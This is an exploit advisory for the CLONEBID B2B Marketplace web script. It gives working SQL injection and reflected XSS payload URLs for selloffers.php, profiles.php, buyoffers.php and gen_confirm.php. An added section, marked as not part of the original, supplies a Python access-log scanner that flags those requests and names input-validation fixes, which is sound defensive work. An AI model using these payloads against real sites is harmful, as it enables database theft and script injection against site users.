/*

Name : CLONEBID B2B Marketplace
Vendor : http://www.clonebid.com

Author : Hamza ’MizoZ’ N.
Email : mizozx[at]gmail[dot]com

Greetz : Zuka !

*/

# SQL Injection :

File : selloffers.php , Get : cid

[HOST]/[PATH]/selloffers.php?cid=[INJECTION]

Demo : http://server/selloffers.php?cid=-14+union+select+1,version%28%29,3,4,5,6,7,8--

!!! : Same vuln => profiles.php & buyoffers.php

# XSS :

[HOST]/[PATH]/gen_confirm.php?errmsg=[SCRIPT :)]

Demo : http://server/gen_confirm.php?errmsg=%3Cscript%3Ealert%281337%29;%3C/script%3E

CLONEBID B2B Marketplace Multiple Vulnerabilities
Hamza ’MizoZ’ N.
01/16/2010
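
Added example (not part of the original advisory and not vendor code): a log check a defender can run over web server access logs to find requests that hit the two parameters reported above with non-numeric `cid` values or markup in `errmsg`. The log format, the sample lines, and the use of `cid` on profiles.php and buyoffers.php are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts and parameters taken from the advisory. That profiles.php and
# buyoffers.php use the same `cid` parameter is an assumption.
NUMERIC_ID_SCRIPTS = {"selloffers.php", "profiles.php", "buyoffers.php"}
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return the rule names triggered by one access-log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    # parse_qs percent-decodes values and turns '+' into a space.
    params = parse_qs(url.query, keep_blank_values=True)
    hits = []
    if script in NUMERIC_ID_SCRIPTS:
        # The id is assumed to be a plain integer; anything else is suspect.
        if any(not re.fullmatch(r"\d+", v) for v in params.get("cid", [])):
            hits.append("sqli:cid")
    if script == "gen_confirm.php":
        # Coarse heuristic: a status message has no reason to carry markup.
        if any(re.search(r"[<>]", v) for v in params.get("errmsg", [])):
            hits.append("xss:errmsg")
    return hits

def scan(lines):
    """Return (line_number, rules) for every line that triggers a rule."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := classify(line))]

# Constructed sample log (documentation IP range). Lines 2 and 3 replay the
# advisory's two demo requests; lines 1 and 4 are benign traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Jan/2010:10:00:01 +0000] "GET /selloffers.php?cid=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [16/Jan/2010:10:00:07 +0000] "GET /selloffers.php?cid=-14+union+select+1,version%28%29,3,4,5,6,7,8-- HTTP/1.1" 200 4312',
    '192.0.2.44 - - [16/Jan/2010:10:00:09 +0000] "GET /gen_confirm.php?errmsg=%3Cscript%3Ealert%281337%29;%3C/script%3E HTTP/1.1" 200 900',
    '192.0.2.10 - - [16/Jan/2010:10:00:15 +0000] "GET /gen_confirm.php?errmsg=Profile+updated HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for number, rules in scan(SAMPLE_LOG):
        print(number, rules)
```

The same two rules (digits only for `cid`, no markup in `errmsg`) are what server-side input validation for these scripts should enforce, alongside parameterized queries and HTML-encoding of the reflected message.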